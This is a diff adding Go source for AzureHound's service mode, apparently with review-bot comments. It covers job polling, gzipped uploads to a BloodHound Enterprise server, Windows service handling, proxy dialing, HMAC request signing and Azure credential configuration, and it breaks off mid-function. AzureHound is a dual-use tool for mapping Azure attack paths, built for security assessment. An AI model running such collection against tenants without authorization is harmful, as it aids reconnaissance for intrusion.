@@ -0,0 +1,439 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "bytes" + "compress/gzip" + "context" + "encoding/json" + "errors" + "fmt" + "io" + "net/http" + "net/url" + "os" + "os/signal" + "runtime" + "sort" + "sync" + "sync/atomic" + "time" + + "github.com/spf13/cobra" + + "github.com/bloodhoundad/azurehound/v2/client/rest" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" +) + +const ( + BHEAuthSignature string = "bhesignature" +) + +var ErrExceededRetryLimit = errors.New("exceeded max retry limit for ingest batch, proceeding with next batch...") + +func init() { + configs := append(config.AzureConfig, config.BloodHoundEnterpriseConfig...) + configs = append(configs, config.CollectionConfig...) 
+ config.Init(startCmd, configs) + rootCmd.AddCommand(startCmd) +} + +var startCmd = &cobra.Command{ + Use: "start", + Short: "Start Azure data collection service for BloodHound Enterprise", + Run: startCmdImpl, + PersistentPreRunE: persistentPreRunE, + SilenceUsage: true, +} + +func startCmdImpl(cmd *cobra.Command, args []string) { + start(cmd.Context()) +} + +func start(ctx context.Context) { + ctx, stop := signal.NotifyContext(ctx, os.Interrupt, os.Kill) + sigChan := make(chan os.Signal) + go func() { + stacktrace := make([]byte, 8192) + for range sigChan { + length := runtime.Stack(stacktrace, true) + fmt.Println(string(stacktrace[:length])) + } + }() + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + if azClient := connectAndCreateClient(); azClient == nil { + exit(fmt.Errorf("azClient is unexpectedly nil")) + } else if bheInstance, err := url.Parse(config.BHEUrl.Value().(string)); err != nil { + exit(fmt.Errorf("unable to parse BHE url: %w", err)) + } else if bheClient, err := newSigningHttpClient(BHEAuthSignature, config.BHETokenId.Value().(string), config.BHEToken.Value().(string), config.Proxy.Value().(string)); err != nil { + exit(fmt.Errorf("failed to create new signing HTTP client: %w", err)) + } else if updatedClient, err := updateClient(ctx, *bheInstance, bheClient); err != nil { + exit(fmt.Errorf("failed to update client: %w", err)) + } else if err := endOrphanedJob(ctx, *bheInstance, bheClient, updatedClient); err != nil { + exit(fmt.Errorf("failed to end orphaned job: %w", err)) + } else { + log.Info("connected successfully! 
waiting for jobs...") + ticker := time.NewTicker(5 * time.Second) + defer ticker.Stop() + + var ( + jobQueued sync.Mutex + currentJobID atomic.Int64 + ) + + for { + select { + case <-ticker.C: + if jobID := currentJobID.Load(); jobID != 0 { + log.V(1).Info("collection in progress...", "jobId", jobID) + if err := checkin(ctx, *bheInstance, bheClient); err != nil { + log.Error(err, "bloodhound enterprise service checkin failed") + } + } else if jobQueued.TryLock() { + go func() { + defer panicrecovery.PanicRecovery() + defer jobQueued.Unlock() + defer bheClient.CloseIdleConnections() + defer azClient.CloseIdleConnections() + + ctx, stop := context.WithCancel(ctx) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + + log.V(2).Info("checking for available collection jobs") + if jobs, err := getAvailableJobs(ctx, *bheInstance, bheClient); err != nil { + log.Error(err, "unable to fetch available jobs for azurehound") + } else { + // Get only the jobs that have reached their execution time + executableJobs := []models.ClientJob{} + now := time.Now() + for _, job := range jobs { + if job.Status == models.JobStatusReady && job.ExecutionTime.Before(now) || job.ExecutionTime.Equal(now) { + executableJobs = append(executableJobs, job) + } + } + + // Sort jobs in ascending order by execution time + sort.Slice(executableJobs, func(i, j int) bool { + return executableJobs[i].ExecutionTime.Before(executableJobs[j].ExecutionTime) + }) + + if len(executableJobs) == 0 { + log.V(2).Info("there are no jobs for azurehound to complete at this time") + } else { + defer currentJobID.Store(0) + queuedJobID := executableJobs[0].ID + currentJobID.Store(int64(queuedJobID)) + // Notify BHE instance of job start + if err := startJob(ctx, *bheInstance, bheClient, queuedJobID); err != nil { + log.Error(err, "failed to start job, will retry on next heartbeat") + return + } + + start := time.Now() + + // Batch data out for ingestion + stream := listAll(ctx, azClient) + batches := 
pipeline.Batch(ctx.Done(), stream, config.ColBatchSize.Value().(int), 10*time.Second) + hasIngestErr := ingest(ctx, *bheInstance, bheClient, batches) + + // Notify BHE instance of job end + duration := time.Since(start) + + message := "Collection completed successfully" + if hasIngestErr { + message = "Collection completed with errors during ingest" + } + if err := endJob(ctx, *bheInstance, bheClient, models.JobStatusComplete, message); err != nil { + log.Error(err, "failed to end job") + } else { + log.Info(message, "id", queuedJobID, "duration", duration.String()) + } + } + } + }() + } + case <-ctx.Done(): + return + } + } + } +} + +func ingest(ctx context.Context, bheUrl url.URL, bheClient *http.Client, in <-chan []interface{}) bool { + endpoint := bheUrl.ResolveReference(&url.URL{Path: "/api/v2/ingest"}) + + var ( + hasErrors = false + maxRetries = 3 + unrecoverableErrMsg = fmt.Sprintf("ending current ingest job due to unrecoverable error while requesting %v", endpoint) + ) + + for data := range pipeline.OrDone(ctx.Done(), in) { + var ( + body bytes.Buffer + gw = gzip.NewWriter(&body) + ) + + ingestData := models.IngestRequest{ + Meta: models.Meta{ + Type: "azure", + }, + Data: data, + } + + err := json.NewEncoder(gw).Encode(ingestData) + if err != nil { + log.Error(err, unrecoverableErrMsg) + } + gw.Close() + + if req, err := http.NewRequestWithContext(ctx, "POST", endpoint.String(), &body); err != nil { + log.Error(err, unrecoverableErrMsg) + return true + } else { + req.Header.Set("User-Agent", constants.UserAgent()) + req.Header.Set("Accept", "application/json") + req.Header.Set("Content-Encoding", "gzip") + for retry := 0; retry < maxRetries; retry++ { + // No retries on regular err cases, only on HTTP 504 Gateway Timeout and HTTP 503 Service Unavailable + if response, err := bheClient.Do(req); err != nil { + if rest.IsClosedConnectionErr(err) { + // try again on force closed connection + log.Error(err, fmt.Sprintf("remote host force closed connection 
while requesting %s; attempt %d/%d; trying again", req.URL, retry+1, maxRetries)) + rest.ExponentialBackoff(retry) + + if retry == maxRetries-1 { + log.Error(ErrExceededRetryLimit, "") + hasErrors = true + } + + continue + } + log.Error(err, unrecoverableErrMsg) + return true + } else if response.StatusCode == http.StatusGatewayTimeout || response.StatusCode == http.StatusServiceUnavailable || response.StatusCode == http.StatusBadGateway { + serverError := fmt.Errorf("received server error %d while requesting %v; attempt %d/%d; trying again", response.StatusCode, endpoint, retry+1, maxRetries) + log.Error(serverError, "") + + rest.ExponentialBackoff(retry) + + if retry == maxRetries-1 { + log.Error(ErrExceededRetryLimit, "") + hasErrors = true + } + if err := response.Body.Close(); err != nil { + log.Error(fmt.Errorf("failed to close ingest body: %w", err), unrecoverableErrMsg) + } + continue + } else if response.StatusCode != http.StatusAccepted { + if bodyBytes, err := io.ReadAll(response.Body); err != nil { + log.Error(fmt.Errorf("received unexpected response code from %v: %s; failure reading response body", endpoint, response.Status), unrecoverableErrMsg) + } else { + log.Error(fmt.Errorf("received unexpected response code from %v: %s %s", req.URL, response.Status, bodyBytes), unrecoverableErrMsg) + } + if err := response.Body.Close(); err != nil { + log.Error(fmt.Errorf("failed to close ingest body: %w", err), unrecoverableErrMsg) + } + return true + } else { + if err := response.Body.Close(); err != nil { + log.Error(fmt.Errorf("failed to close ingest body: %w", err), unrecoverableErrMsg) + } + } + } + } + } + return hasErrors +} + +// TODO: create/use a proper bloodhound client +func do(bheClient *http.Client, req *http.Request) (*http.Response, error) { + var ( + res *http.Response + maxRetries = 3 + ) + + // copy the bytes in case we need to retry the request + if body, err := rest.CopyBody(req); err != nil { + return nil, err + } else { + for retry := 0; 
retry < maxRetries; retry++ {
+ // Reusing http.Request requires rewinding the request body
+ // back to a working state
+ if body != nil && retry > 0 {
+ req.Body = io.NopCloser(bytes.NewBuffer(body))
+ }
+
+ if res, err = bheClient.Do(req); err != nil {
+ if rest.IsClosedConnectionErr(err) {
+ // try again on force closed connections
+ log.Error(err, fmt.Sprintf("remote host force closed connection while requesting %s; attempt %d/%d; trying again", req.URL, retry+1, maxRetries))
+ rest.ExponentialBackoff(retry)
+ continue
+ }
+ // normal client error, dont attempt again
+ return nil, err
+ } else if res.StatusCode < http.StatusOK || res.StatusCode >= http.StatusBadRequest {
+ if res.StatusCode >= http.StatusInternalServerError {
+ // Internal server error, backoff and try again.
+ serverError := fmt.Errorf("received server error %d while requesting %v", res.StatusCode, req.URL)
+ log.Error(serverError, fmt.Sprintf("attempt %d/%d; trying again", retry+1, maxRetries))
+
+ rest.ExponentialBackoff(retry)
+ continue
+ }
+ // bad request we do not need to retry
+ var body json.RawMessage
+ defer res.Body.Close()
+ if err := json.NewDecoder(res.Body).Decode(&body); err != nil {
+ return nil, fmt.Errorf("received unexpected response code from %v: %s; failure reading response body", req.URL, res.Status)
+ } else {
+ return nil, fmt.Errorf("received unexpected response code from %v: %s %s", req.URL, res.Status, body)
+ }
+ } else {
+ return res, nil
+ }
+ }
+ }
+
+ return nil, fmt.Errorf("unable to complete request to url=%s; attempts=%d;", req.URL, maxRetries)
+}
+
+type basicResponse[T any] struct {
+ Data T `json:"data"`
+}
+
+func getAvailableJobs(ctx context.Context, bheUrl url.URL, bheClient *http.Client) ([]models.ClientJob, error) {
+ var (
+ endpoint = bheUrl.ResolveReference(&url.URL{Path: "/api/v2/jobs/available"})
+ response basicResponse[[]models.ClientJob]
+ )
+
+ if req, err := rest.NewRequest(ctx, "GET", endpoint, nil, nil, nil); err != nil {
+ return nil, err
+ } else if res, err := do(bheClient, req); err != nil {
+ return nil, err
+ } else {
+ defer res.Body.Close()
+ if err := json.NewDecoder(res.Body).Decode(&response); err != nil {
+ return nil, err
+ } else {
+ return response.Data, nil
+ }
+ }
+}
+
+func checkin(ctx context.Context, bheUrl url.URL, bheClient *http.Client) error {
+ endpoint := bheUrl.ResolveReference(&url.URL{Path: "/api/v2/jobs/current"})
+
+ if req, err := rest.NewRequest(ctx, "GET", endpoint, nil, nil, nil); err != nil {
+ return err
+ } else if res, err := do(bheClient, req); err != nil {
+ return err
+ } else {
+ res.Body.Close()
+ return nil
+ }
+}
+
+func startJob(ctx context.Context, bheUrl url.URL, bheClient *http.Client, jobId int) error {
+ log.Info("beginning collection job", "id", jobId)
+ var (
+ endpoint = bheUrl.ResolveReference(&url.URL{Path: "/api/v2/jobs/start"})
+ body = map[string]int{
+ "id": jobId,
+ }
+ )
+
+ if req, err := rest.NewRequest(ctx, "POST", endpoint, body, nil, nil); err != nil {
+ return err
+ } else if res, err := do(bheClient, req); err != nil {
+ return err
+ } else {
+ res.Body.Close()
+ return nil
+ }
+}
+
+func endJob(ctx context.Context, bheUrl url.URL, bheClient *http.Client, status models.JobStatus, message string) error {
+ endpoint := bheUrl.ResolveReference(&url.URL{Path: "/api/v2/jobs/end"})
+
+ body := models.CompleteJobRequest{
+ Status: status.String(),
+ Message: message,
+ }
+
+ if req, err := rest.NewRequest(ctx, "POST", endpoint, body, nil, nil); err != nil {
+ return err
+ } else if res, err := do(bheClient, req); err != nil {
+ return err
+ } else {
+ res.Body.Close()
+ return nil
+ }
+}
+
+func updateClient(ctx context.Context, bheUrl url.URL, bheClient *http.Client) (*models.UpdateClientResponse, error) {
+ var (
+ endpoint = bheUrl.ResolveReference(&url.URL{Path: "/api/v2/clients/update"})
+ response = basicResponse[models.UpdateClientResponse]{}
+ )
+ if addr, err := dial(bheUrl.String()); err != nil {
+ return nil, err
+ } else {
+ // hostname is nice to have but we don't really need it
+ hostname, _ := os.Hostname()
+
+ body := models.UpdateClientRequest{
+ Address: addr,
+ Hostname: hostname,
+ Version: constants.Version,
+ }
+
+ log.V(2).Info("updating client info", "info", body)
+
+ if req, err := rest.NewRequest(ctx, "PUT", endpoint, body, nil, nil); err != nil {
+ return nil, err
+ } else if res, err := do(bheClient, req); err != nil {
+ return nil, err
+ } else {
+ defer res.Body.Close()
+ if err := json.NewDecoder(res.Body).Decode(&response); err != nil {
+ return nil, err
+ } else {
+ return &response.Data, nil
+ }
+ }
+ }
+}
+
+func endOrphanedJob(ctx context.Context, bheUrl url.URL, bheClient *http.Client, updatedClient *models.UpdateClientResponse) error {
+ if updatedClient.CurrentJob.Status == models.JobStatusRunning {
+ log.Info("the service started with an orphaned job in progress, sending job completion notice...", "jobId", updatedClient.CurrentJobID)
+ return endJob(ctx, bheUrl, bheClient, models.JobStatusFailed, "This job has been orphaned. Re-run collection for complete data.")
+ } else {
+ return nil
+ }
+}
diff --git a/cmd/svc_windows.go b/cmd/svc_windows.go
new file mode 100644
index 0000000..a3109f4
--- /dev/null
+++ b/cmd/svc_windows.go
@@ -0,0 +1,82 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/logger"
+ "github.com/judwhite/go-svc"
+)
+
+func StartWindowsService() error {
+ if err := svc.Run(&azurehoundSvc{}); err != nil {
+ return err
+ } else {
+ return nil
+ }
+}
+
+type azurehoundSvc struct {
+ cancel context.CancelFunc
+}
+
+func (s *azurehoundSvc) Init(env svc.Environment) error {
+ config.LoadValues(nil, config.Options())
+ config.SetAzureDefaults()
+
+ if logr, err := logger.GetLogger(); err != nil {
+ return err
+ } else {
+ log = *logr
+ config.CheckCollectionConfigSanity(log)
+
+ if config.ConfigFileUsed() != "" {
+ log.V(1).Info(fmt.Sprintf("Config File: %v", config.ConfigFileUsed()))
+ }
+
+ if config.LogFile.Value() != "" {
+ log.V(1).Info(fmt.Sprintf("Log File: %v", config.LogFile.Value()))
+ }
+
+ return nil
+ }
+}
+
+func (s *azurehoundSvc) Start() error {
+ if err := s.Stop(); err != nil {
+ return err
+ } else {
+ log.Info("starting azurehound service...", "config", config.ConfigFileUsed())
+ ctx, stop := context.WithCancel(context.Background())
+ s.cancel = stop
+ go start(ctx)
+ return nil
+ }
+}
+
+func (s *azurehoundSvc) Stop() error {
+ if s.cancel != nil {
+ log.Info("stopping azurehound service...")
+ s.cancel()
+ s = nil
+ }
+ return nil
+}
diff --git a/cmd/uninstall_windows.go b/cmd/uninstall_windows.go
new file mode 100644
index 0000000..a09e747
--- /dev/null
+++ b/cmd/uninstall_windows.go
@@ -0,0 +1,67 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/spf13/cobra"
+ "golang.org/x/sys/windows/svc/eventlog"
+ "golang.org/x/sys/windows/svc/mgr"
+)
+
+func init() {
+ rootCmd.AddCommand(uninstallCmd)
+}
+
+var uninstallCmd = &cobra.Command{
+ Use: "uninstall",
+ Short: "Removes AzureHound as a system service",
+ Run: uninstallCmdImpl,
+ PersistentPreRunE: persistentPreRunE,
+ SilenceUsage: true,
+}
+
+func uninstallCmdImpl(cmd *cobra.Command, args []string) {
+ if err := uninstallService(constants.Name); err != nil {
+ exit(fmt.Errorf("failed to uninstall service: %w", err))
+ }
+}
+
+func uninstallService(name string) error {
+ if wsm, err := mgr.Connect(); err != nil {
+ return err
+ } else {
+ defer wsm.Disconnect()
+
+ if service, err := wsm.OpenService(name); err != nil {
+ return err
+ } else {
+ defer service.Close()
+
+ if err := service.Delete(); err != nil {
+ return err
+ } else if err := eventlog.Remove(name); err != nil {
+ return err
+ } else {
+ return nil
+ }
+ }
+ }
+}
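Review bot: In `azurehoundSvc.Stop`, the statement `s = nil` only rebinds the method's local receiver pointer, so the struct keeps its old `cancel` func after the service has been stopped. Because `Start` calls `Stop` first, a later start will log "stopping azurehound service..." and invoke an already-used cancel func; the line should be `s.cancel = nil`. Separately, `go start(ctx)` in `Start` is never waited on, so `Stop` returns before the collector goroutine has actually finished; a done channel or `sync.WaitGroup` that `Stop` waits on would give the service manager a clean shutdown.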
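Review bot: `uninstallService` calls `service.Delete()` without stopping the service first; on Windows a running service is only marked for deletion and keeps executing until it stops or the host restarts, so the collector and the credentials it holds can outlive the "uninstall". Consider sending a stop control before the delete, e.g. `service.Control(svc.Stop)` from `golang.org/x/sys/windows/svc`, and waiting for the stopped state. Also, when `eventlog.Remove` fails after `Delete` has succeeded, the caller reports "failed to uninstall service" although the service entry is already gone; wrapping the two errors with distinct context would make that state visible.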
diff --git a/cmd/utils.go b/cmd/utils.go
new file mode 100644
index 0000000..6d4792a
--- /dev/null
+++ b/cmd/utils.go
@@ -0,0 +1,489 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "bufio"
+ "bytes"
+ "context"
+ "crypto/hmac"
+ "crypto/sha256"
+ "crypto/tls"
+ "encoding/base64"
+ "fmt"
+ "io"
+ "io/fs"
+ "net"
+ "net/http"
+ "net/url"
+ "os"
+ "path"
+ "path/filepath"
+ "runtime/pprof"
+ "time"
+
+ "github.com/spf13/cobra"
+ "golang.org/x/net/proxy"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ client_config "github.com/bloodhoundad/azurehound/v2/client/config"
+ "github.com/bloodhoundad/azurehound/v2/client/rest"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/logger"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/bloodhoundad/azurehound/v2/sinks"
+)
+
+func exit(err error) {
+ log.Error(err, "encountered unrecoverable error")
+ log.GetSink()
+ os.Exit(1)
+}
+
+func persistentPreRunE(cmd *cobra.Command, args []string) error {
+ // need to set config flag value explicitly
+ if cmd != nil {
+ if configFlag := cmd.Flag(config.ConfigFile.Name).Value.String(); configFlag != "" {
+ config.ConfigFile.Set(configFlag)
+ }
+ }
+
+ config.LoadValues(cmd, config.Options())
+ config.SetAzureDefaults()
+
+ if logr, err := logger.GetLogger(); err != nil {
+ return err
+ } else {
+ log = *logr
+ config.CheckCollectionConfigSanity(log)
+
+ if config.ConfigFileUsed() != "" {
+ log.V(1).Info(fmt.Sprintf("Config File: %v", config.ConfigFileUsed()))
+ }
+
+ if config.LogFile.Value() != "" {
+ log.V(1).Info(fmt.Sprintf("Log File: %v", config.LogFile.Value()))
+ }
+
+ return nil
+ }
+}
+
+func gracefulShutdown(stop context.CancelFunc) {
+ stop()
+ fmt.Fprintln(os.Stderr, "\nshutting down gracefully, press ctrl+c again to force")
+ if profile := pprof.Lookup(config.Pprof.Value().(string)); profile != nil {
+ profile.WriteTo(os.Stderr, 1)
+ }
+}
+
+func testConnections() error {
+ if _, err := dial(config.AzAuthUrl.Value().(string)); err != nil {
+ return fmt.Errorf("unable to connect to %s: %w", config.AzAuthUrl.Value(), err)
+ } else if _, err := dial(config.AzGraphUrl.Value().(string)); err != nil {
+ return fmt.Errorf("unable to connect to %s: %w", config.AzGraphUrl.Value(), err)
+ } else if _, err := dial(config.AzMgmtUrl.Value().(string)); err != nil {
+ return fmt.Errorf("unable to connect to %s: %w", config.AzMgmtUrl.Value(), err)
+ } else {
+ return nil
+ }
+}
+
+type httpsDialer struct{}
+
+func (s httpsDialer) Dial(network string, addr string) (net.Conn, error) {
+ return tls.Dial(network, addr, &tls.Config{})
+}
+
+func newProxyDialer(url *url.URL, forward proxy.Dialer) (proxy.Dialer, error) {
+ dialer := &proxyDialer{
+ host: url.Host,
+ forward: forward,
+ }
+
+ if url.User != nil {
+ dialer.user = url.User.Username()
+ dialer.pass, _ = url.User.Password()
+ }
+
+ return dialer, nil
+}
+
+type proxyDialer struct {
+ host string
+ user string
+ pass string
+ forward proxy.Dialer
+}
+
+func (s proxyDialer) Dial(network string, addr string) (net.Conn, error) {
+ if s.forward == nil {
+ return nil, fmt.Errorf("unable to connect to %s: forward dialer not set", s.host)
+ } else if conn, err := s.forward.Dial(network, s.host); err != nil {
+ return nil, fmt.Errorf("unable to connect to %s: %w", s.host, err)
+ } else if req, err := http.NewRequest("CONNECT", "//"+addr, nil); err != nil {
+ conn.Close()
+ return nil, fmt.Errorf("unable to connect to %s: %w", addr, err)
+ } else {
+ req.Close = false
+ if s.user != "" {
+ req.SetBasicAuth(s.user, s.pass)
+ }
+
+ // Write request over proxy connection
+ if err := req.Write(conn); err != nil {
+ conn.Close()
+ return nil, fmt.Errorf("unable to connect to %s: %w", addr, err)
+ }
+
+ res, err := http.ReadResponse(bufio.NewReader(conn), req)
+ defer func() {
+ if res.Body != nil {
+ res.Body.Close()
+ }
+ }()
+
+ if err != nil {
+ conn.Close()
+ return nil, fmt.Errorf("unable to connect to %s: %w", addr, err)
+ } else if res.StatusCode != 200 {
+ if res.Body != nil {
+ res.Body.Close()
+ }
+ conn.Close()
+ return nil, fmt.Errorf("unable to connect to %s via proxy (%s): statusCode %d", addr, s.host, res.StatusCode)
+ } else {
+ return conn, nil
+ }
+ }
+}
+
+func getDialer() (proxy.Dialer, error) {
+ if proxyUrl := config.Proxy.Value().(string); proxyUrl == "" {
+ return proxy.Direct, nil
+ } else if url, err := url.Parse(proxyUrl); err != nil {
+ return nil, err
+ } else if url.Scheme == "https" {
+ return proxy.FromURL(url, httpsDialer{})
+ } else {
+ return proxy.FromURL(url, proxy.Direct)
+ }
+}
+
+func init() {
+ proxy.RegisterDialerType("http", newProxyDialer)
+ proxy.RegisterDialerType("https", newProxyDialer)
+}
+
+func dial(targetUrl string) (string, error) {
+ log.V(2).Info("dialing...", "targetUrl", targetUrl)
+ if dialer, err := getDialer(); err != nil {
+ return "", err
+ } else if url, err := url.Parse(targetUrl); err != nil {
+ return "", err
+ } else {
+ port := url.Port()
+
+ if port == "" {
+ port = "443"
+ }
+
+ if conn, err := dialer.Dial("tcp", fmt.Sprintf("%s:%s", url.Hostname(), port)); err != nil {
+ return "", err
+ } else {
+ defer conn.Close()
+ addr := conn.LocalAddr().(*net.TCPAddr)
+ return addr.IP.String(), nil
+ }
+ }
+}
+
+func newAzureClient() (client.AzureClient, error) {
+ var (
+ certFile = config.AzCert.Value()
+ keyFile = config.AzKey.Value()
+ clientCert string
+ clientKey string
+ )
+
+ if file, ok := certFile.(string); ok && file != "" {
+ if content, err := os.ReadFile(certFile.(string)); err != nil {
+ return nil, fmt.Errorf("unable to read provided certificate: %w", err)
+ } else {
+ clientCert = string(content)
+ }
+ }
+
+ if file, ok := keyFile.(string); ok && file != "" {
+ if content, err := os.ReadFile(keyFile.(string)); err != nil {
+ return nil, fmt.Errorf("unable to read provided key file: %w", err)
+ } else {
+ clientKey = string(content)
+ }
+ }
+
+ config := client_config.Config{
+ ApplicationId: config.AzAppId.Value().(string),
+ Authority: config.AzAuthUrl.Value().(string),
+ ClientSecret: config.AzSecret.Value().(string),
+ ClientCert: clientCert,
+ ClientKey: clientKey,
+ ClientKeyPass: config.AzKeyPass.Value().(string),
+ Graph: config.AzGraphUrl.Value().(string),
+ JWT: config.JWT.Value().(string),
+ Management: config.AzMgmtUrl.Value().(string),
+ MgmtGroupId: config.AzMgmtGroupId.Value().([]string),
+ Password: config.AzPassword.Value().(string),
+ ProxyUrl: config.Proxy.Value().(string),
+ RefreshToken: config.RefreshToken.Value().(string),
+ Region: config.AzRegion.Value().(string),
+ SubscriptionId: config.AzSubId.Value().([]string),
+ Tenant: config.AzTenant.Value().(string),
+ Username: config.AzUsername.Value().(string),
+ }
+ return client.NewClient(config)
+}
+
+func newSigningHttpClient(signature, tokenId, token, proxyUrl string) (*http.Client, error) {
+ if client, err := rest.NewHTTPClient(proxyUrl); err != nil {
+ return nil, err
+ } else {
+ client.Transport = signingTransport{
+ base: client.Transport,
+ tokenId: tokenId,
+ token: token,
+ signature: signature,
+ }
+ return client, nil
+ }
+}
+
+type rewindableByteReader struct {
+ data *bytes.Reader
+}
+
+func (s *rewindableByteReader) Read(p []byte) (int, error) {
+ return s.data.Read(p)
+}
+
+func (s *rewindableByteReader) Close() error {
+ return nil
+}
+
+func (s *rewindableByteReader) Rewind() (int64, error) {
+ return s.data.Seek(0, io.SeekStart)
+}
+
+func discard(reader io.Reader) {
+ io.Copy(io.Discard, reader)
+}
+
+type signingTransport struct {
+ base http.RoundTripper
+ tokenId string
+ token string
+ signature string
+}
+
+func (s signingTransport) RoundTrip(req *http.Request) (*http.Response, error) {
+ // The http client may try to call RoundTrip more than once to replay the same request; in which case rewind the request
+ if rbr, ok := req.Body.(*rewindableByteReader); ok {
+ if _, err := rbr.Rewind(); err != nil {
+ return nil, err
+ }
+ }
+
+ if req.Header.Get("Signature") == "" {
+
+ // token
+ digester := hmac.New(sha256.New, []byte(s.token))
+
+ // path
+ if _, err := digester.Write([]byte(req.Method + req.URL.Path)); err != nil {
+ return nil, err
+ }
+
+ // datetime
+ datetime := time.Now().Format(time.RFC3339)
+ digester = hmac.New(sha256.New, digester.Sum(nil))
+ // hash the substring of the current datetime excluding minutes, seconds, microseconds and timezone
+ if _, err := digester.Write([]byte(datetime[:13])); err != nil {
+ return nil, err
+ }
+
+ // body
+ digester = hmac.New(sha256.New, digester.Sum(nil))
+ if req.Body != nil {
+ var (
+ body = &bytes.Buffer{}
+ hashBuf = make([]byte, 64*1024) // 64KB buffer, consider benchmarking and optimizing this value
+ tee = io.TeeReader(req.Body, body)
+ )
+
+ defer req.Body.Close()
+ defer discard(tee)
+ defer discard(body)
+
+ for {
+ numRead, err := tee.Read(hashBuf)
+ if numRead > 0 {
+ if _, err := digester.Write(hashBuf[:numRead]); err != nil {
+ return nil, err
+ }
+ }
+
+ // exit loop on EOF or error
+ if err != nil {
+ if err != io.EOF {
+ return nil, err
+ }
+ break
+ }
+ }
+
+ req.Body = &rewindableByteReader{data: bytes.NewReader(body.Bytes())}
+ }
+
+ signature := digester.Sum(nil)
+
+ req.Header.Set("Authorization", fmt.Sprintf("%s %s", s.signature, s.tokenId))
+ req.Header.Set("RequestDate", datetime)
+ req.Header.Set("Signature", base64.StdEncoding.EncodeToString(signature))
+ }
+ return s.base.RoundTrip(req)
+}
+
+func contains[T comparable](collection []T, value T) bool {
+ for _, item := range collection {
+ if item == value {
+ return true
+ }
+ }
+ return false
+}
+
+func unique(collection []string) []string {
+ keys := make(map[string]bool)
+ list := []string{}
+ for _, item := range collection {
+ if _, found := keys[item]; !found {
+ keys[item] = true
+ list = append(list, item)
+ }
+ }
+ return list
+}
+
+func stat(path string) (string, fs.FileInfo, error) {
+ if info, err := os.Stat(path); err == nil {
+ return path, info, nil
+ } else {
+ p := path + ".exe"
+ info, err := os.Stat(p)
+ return p, info, err
+ }
+}
+
+func getExePath() (string, error) {
+ exe := os.Args[0]
+ if exePath, err := filepath.Abs(exe); err != nil {
+ return "", err
+ } else if path, info, err := stat(exePath); err != nil {
+ return "", err
+ } else if info.IsDir() {
+ return "", fmt.Errorf("%s is a directory", path)
+ } else {
+ return path, nil
+ }
+}
+
+func setupLogger() {
+ if logger, err := logger.GetLogger(); err != nil {
+ panic(err)
+ } else {
+ log = *logger
+ }
+}
+
+// deprecated: use azureWrapper instead
+type AzureWrapper struct {
+ Kind enums.Kind `json:"kind"`
+ Data interface{} `json:"data"`
+}
+
+type azureWrapper[T any] struct {
+ Kind enums.Kind `json:"kind"`
+ Data T `json:"data"`
+}
+
+func NewAzureWrapper[T any](kind enums.Kind, data T) azureWrapper[T] {
+ return azureWrapper[T]{
+ Kind: kind,
+ Data: data,
+ }
+}
+
+func outputStream[T any](ctx context.Context, stream <-chan T) {
+ formatted := pipeline.FormatJson(ctx.Done(), stream)
+ if path := config.OutputFile.Value().(string); path != "" {
+ if err := sinks.WriteToFile(ctx, path, formatted); err != nil {
+ exit(fmt.Errorf("failed to write stream to file: %w", err))
+ }
+ } else {
+ sinks.WriteToConsole(ctx, formatted)
+ }
+}
+
+func kvRoleAssignmentFilter(roleId string) func(models.KeyVaultRoleAssignment) bool {
+ return func(ra models.KeyVaultRoleAssignment) bool {
+ return path.Base(ra.RoleAssignment.Properties.RoleDefinitionId) == roleId
+ }
+}
+
+func vmRoleAssignmentFilter(roleId string) func(models.VirtualMachineRoleAssignment) bool {
